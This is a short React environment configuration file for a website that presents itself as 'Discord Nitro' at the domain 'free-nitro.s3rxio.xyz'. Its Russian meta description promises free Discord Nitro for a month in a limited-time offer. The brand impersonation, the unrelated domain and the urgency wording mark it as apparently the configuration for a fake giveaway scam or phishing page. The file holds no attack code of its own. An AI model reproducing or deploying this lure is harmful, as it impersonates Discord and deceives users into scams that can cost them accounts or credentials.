PUBLIC_URL=.

REACT_APP_URL=https://free-nitro.s3rxio.xyz
REACT_APP_WEBSITE_TITLE=Discord Nitro

REACT_APP_META_TITLE=Discord Nitro
REACT_APP_META_DESCRIPTION=Только сегодня, Бесплатный Discord Nitro на месяц! Акция действует только до конца месяца, будь первым.